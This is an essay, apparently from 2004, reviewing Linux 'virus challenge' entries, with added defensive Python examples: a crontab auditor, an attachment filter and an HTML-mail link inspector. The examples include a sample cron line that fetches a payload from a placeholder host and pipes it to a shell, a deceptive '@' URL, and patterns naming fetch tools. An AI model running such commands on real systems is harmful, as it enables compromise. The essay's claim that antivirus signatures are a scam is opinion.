
But seriously...

The virus entries in the challenge were fun and good for a bit of a laugh, but they illustrate serious issues in computer security.

Entry 1

Entry 1 is a classical social-engineering attack. It relies on the recipient to perform some kind of action to activate the malicious software. Now clearly, Entry 1 has little chance of spreading, because the actions which the user must take involve several steps, would immediately arouse the suspicions of experienced Linux users, and would be beyond the capabilities of novice users.

The reason social-engineering attacks are so successful on Microsoft platforms, especially Microsoft Outlook, is that the kind of thing you need to trick the user into doing is very simple---typically a single mouse-click. True, many installations pop up warning dialogs for "potentially dangerous" actions, but novice users are used to many such dialogs, and probably just dismiss them as a matter of course.

Nagging the user is not a substitute for security.

Entry 2

Entry 2 is a "mutation" of entry 1. It is somewhat nastier in that it tries to install itself in your cron table and re-execute the malicious code periodically.
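A defender's view of the cron persistence described above, as an added example that is not part of the original article: a small audit script that parses crontab entries and flags commands showing the traits a self-installing script would leave behind (running from a temporary or hidden directory, fetching content from the network, or piping fetched output into a shell). The sample crontab lines are constructed for the example.

```python
import re

# Constructed sample crontab (not from the article). The third and fourth
# entries are the kind of persistence a self-installing script would add.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/local/bin/backup.sh
*/5 * * * * /tmp/.x/update >/dev/null 2>&1
@hourly lynx -source http://example.invalid/payload | sh
30 6 * * 1 /home/alice/bin/report.py
"""

# Indicators that a cron command re-executes dropped or remotely fetched code.
SUSPICIOUS = [
    (re.compile(r"(^|\s|=)/(tmp|var/tmp|dev/shm)/"), "runs from a temp directory"),
    (re.compile(r"\|\s*(ba|da|z|k)?sh\b"), "pipes output into a shell"),
    (re.compile(r"\b(lynx|wget|curl|fetch)\b"), "fetches content from the network"),
    (re.compile(r"/\.[^/\s]+/"), "uses a hidden dot-directory"),
]

SCHEDULE_ALIASES = ("@reboot", "@yearly", "@annually", "@monthly",
                    "@weekly", "@daily", "@hourly")

def split_entry(line):
    """Return (schedule, command) for a crontab entry, or None for blanks/comments."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    if line.startswith("@"):
        parts = line.split(None, 1)
        if len(parts) == 2 and parts[0] in SCHEDULE_ALIASES:
            return parts[0], parts[1]
        return None
    parts = line.split(None, 5)          # five time fields, then the command
    if len(parts) < 6:
        return None
    return " ".join(parts[:5]), parts[5]

def audit_crontab(text):
    """Return (schedule, command, [reasons]) for every entry that looks suspicious."""
    findings = []
    for line in text.splitlines():
        entry = split_entry(line)
        if entry is None:
            continue
        schedule, command = entry
        reasons = [why for pattern, why in SUSPICIOUS if pattern.search(command)]
        if reasons:
            findings.append((schedule, command, reasons))
    return findings

if __name__ == "__main__":
    for schedule, command, reasons in audit_crontab(SAMPLE_CRONTAB):
        print(f"{schedule}: {command}\n    " + "; ".join(reasons))
```

Run it against the output of `crontab -l` for each user (and the system crontab files) to get a quick list of entries worth a closer look; the patterns are deliberately broad, so treat a hit as a prompt to inspect, not as proof of infection.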

Mutations are interesting for the following reason: Most commercial anti-virus software relies on signatures to detect viruses. Such signatures are next to useless in the face of easily-mutated viruses. In fact, the whole idea of a signature database which must be updated periodically is a huge scam. It is designed simply to ensure a steady flow of revenue to anti-virus vendors.

Signatures cannot detect brand-new viruses, and usually fail to detect mutated viruses. Blocking all executable attachments at the server and using software which does not allow its data files to contain executable content are far more effective than any possible signature-based detection scheme.

Signatures fail in the face of new viruses, and are designed solely to ensure a revenue stream for anti-virus vendors.
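The server-side attachment blocking recommended above, as an added example (not code from the article or from Roaring Penguin): a filter that rejects attachments by a list of executable extensions and, independently of the file name, by the leading bytes of common executable formats, so that renaming a binary does not get it past the check. The message, the extension list and the magic-byte list are constructed for the example.

```python
import os
import email
from email import policy
from email.message import EmailMessage

# Extensions rejected outright (a constructed list; extend to taste).
BLOCKED_EXTENSIONS = {".exe", ".com", ".bat", ".cmd", ".pif", ".scr",
                      ".vbs", ".js", ".sh", ".pl"}
# Leading bytes of common executable formats: ELF, DOS/Windows PE ("MZ"), script shebang.
EXECUTABLE_MAGIC = (b"\x7fELF", b"MZ", b"#!")

def build_sample_message():
    """Build a constructed message with a text file, a renamed ELF binary and a .EXE."""
    msg = EmailMessage()
    msg["From"] = "sender@example.invalid"
    msg["To"] = "recipient@example.invalid"
    msg["Subject"] = "Quarterly report"
    msg.set_content("Please see the attached files.")
    msg.add_attachment("Totals for Q3\n", filename="notes.txt")
    # ELF header bytes under a harmless-looking name: the extension check misses it.
    msg.add_attachment(b"\x7fELF\x01\x01\x01" + b"\x00" * 9,
                       maintype="application", subtype="octet-stream", filename="report.dat")
    msg.add_attachment(b"MZ\x90\x00" + b"\x00" * 12,
                       maintype="application", subtype="octet-stream", filename="Invoice.EXE")
    return msg

def classify_attachment(part):
    """Return a reason string if the MIME part should be blocked, else None."""
    filename = part.get_filename() or ""
    ext = os.path.splitext(filename)[1].lower()
    if ext in BLOCKED_EXTENSIONS:
        return f"blocked extension {ext}"
    payload = part.get_payload(decode=True) or b""
    if payload.startswith(EXECUTABLE_MAGIC):
        return "executable content regardless of name"
    return None

def scan_message(msg):
    """Return (filename, reason) for each attachment that must be blocked."""
    blocked = []
    for part in msg.iter_attachments():
        reason = classify_attachment(part)
        if reason:
            blocked.append((part.get_filename(), reason))
    return blocked

def scan_raw_message(raw_bytes):
    """Entry point for a mail server: parse the wire-format message, then scan it."""
    msg = email.message_from_bytes(raw_bytes, policy=policy.default)
    return scan_message(msg)

if __name__ == "__main__":
    for filename, reason in scan_raw_message(build_sample_message().as_bytes()):
        print(f"reject {filename}: {reason}")
```

The point of the magic-byte check is that the extension list alone is a signature of sorts, and a sender who renames the file defeats it; refusing anything whose content is executable is the policy the text argues for, and it needs no updates when a new virus appears.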

Entry 3

Entry 3 also relies on tricking the recipient into performing an action. The action (running lynx and feeding the output to a shell) is not obviously malicious, however, and one popular Linux software creator actually recommends a similar action to install its software. Therefore, I consider Entry 3 the closest thing to something which could actually spread.

Entry 3 is interesting also because the actual viral code comes from a central server. This allows the virus author to track the spread of infection. By modifying the URL to contain more information, he could even track the names of people who are infected.

On the other hand, a central-server approach makes it much easier to track down the person responsible for a virus, and also introduces a single point of failure in the propagation mechanism.

Entry 3 is interesting also because it purports to install a security fix for a serious problem. If the URL had looked like it came from a legitimate site, people might be tempted to run the command. For example, the following URL looks like it points to Microsoft:


but it does not...

Note that popular "web bugs" use a similar mechanism to allow marketers to track the recipients of SPAM e-mail. This is why I recommend reading your e-mail in a non-HTML mail reader, or at the very least, a mail reader which does not automatically fetch URLs.

Beware of automatic-execution of remotely-fetched content. Beware even of mail readers which automatically fetch content off the Internet.
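The two points above (a URL that looks like it points to one site but does not, and mail readers that fetch remote content) can be checked mechanically. The following is an added example, not code from the article: it walks an HTML mail body, lists every remote resource a rendering client would fetch, and reports the host each link really resolves to. The article does not show its look-alike URL; this example assumes the common form of that trick, in which a "user@" prefix in the URL makes the start of the address resemble a trusted site while the request goes to the host after the "@". The HTML body is constructed for the example.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed HTML mail body (not from the article). The first image is a
# tracking pixel carrying a per-recipient identifier; the link's visible text
# names one site while the href's userinfo part hides the real host.
SAMPLE_HTML = """\
<html><body>
<p>Important security update, please apply now.</p>
<img src="http://tracker.example.invalid/pixel.gif?rcpt=abc123" width="1" height="1">
<a href="http://www.microsoft.com@update-host.example.invalid/fix.sh">http://www.microsoft.com/fix.sh</a>
<img src="cid:logo@example.invalid">
</body></html>
"""

class RemoteResourceCollector(HTMLParser):
    """Collect image sources and links (with their visible text) from an HTML body."""
    def __init__(self):
        super().__init__()
        self.images = []
        self.links = []
        self._anchor = None

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "img" and attrs.get("src"):
            self.images.append(attrs["src"])
        elif tag == "a" and attrs.get("href"):
            self._anchor = {"href": attrs["href"], "text": ""}

    def handle_data(self, data):
        if self._anchor is not None:
            self._anchor["text"] += data

    def handle_endtag(self, tag):
        if tag == "a" and self._anchor is not None:
            self.links.append(self._anchor)
            self._anchor = None

def real_host(url):
    """Host a client would actually connect to, or None for non-network URLs (cid:, mailto:)."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return None
    return parts.hostname      # userinfo before '@' is discarded here

def inspect_html_mail(html):
    """Return (kind, url, real_host) findings for remote fetches and deceptive links."""
    collector = RemoteResourceCollector()
    collector.feed(html)
    findings = []
    for src in collector.images:
        host = real_host(src)
        if host:
            findings.append(("remote-image", src, host))
    for link in collector.links:
        host = real_host(link["href"])
        if host is None:
            continue
        text = link["text"].strip()
        shown = urlsplit(text).hostname if "://" in text else None
        if "@" in urlsplit(link["href"]).netloc or (shown and shown != host):
            findings.append(("deceptive-link", link["href"], host))
    return findings

if __name__ == "__main__":
    for kind, url, host in inspect_html_mail(SAMPLE_HTML):
        print(f"{kind}: {url}\n    really contacts {host}")
```

A mail reader that shows the output of `real_host` next to every link, and fetches nothing from the network until asked, removes both the tracking and the deception; the `cid:` image is a message-internal reference and is correctly ignored.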

Entry 4

Entry 4 is simply a hoax. It was mailed from a machine owned by Via Networks in France.

Hoaxes are interesting because for a while, there were many virus hoaxes circulating on the Internet. Because people are so used to Windows machines being infected by viruses, these hoaxes can cause almost as much damage as real viruses. They also serve as advertising for anti-virus vendors, who must be fairly satisfied with their marketing potential.

If you can't trust your software, even hoaxes can be as damaging as real viruses.

Entry 5

Entry 5 was a real attempt at an exploit, and it had a very good chance of succeeding. It may well have compromised my machine, although the chances of propagation beyond that were fairly slim.

Software diversity makes it harder for viruses to propagate.

But even UNIX users cannot be complacent. If I hadn't upgraded Pine as soon as I heard about the vulnerability, and if I hadn't been suspicious of the e-mail, I could well have fallen victim to the exploit. Nevertheless, I still believe that mass-mailing viruses are almost impossible under Linux, because Entry 5 was a carefully targeted exploit aimed at me by someone who knew my software setup.

David F. Skoll

Copyright © 2004 Roaring Penguin Software Inc.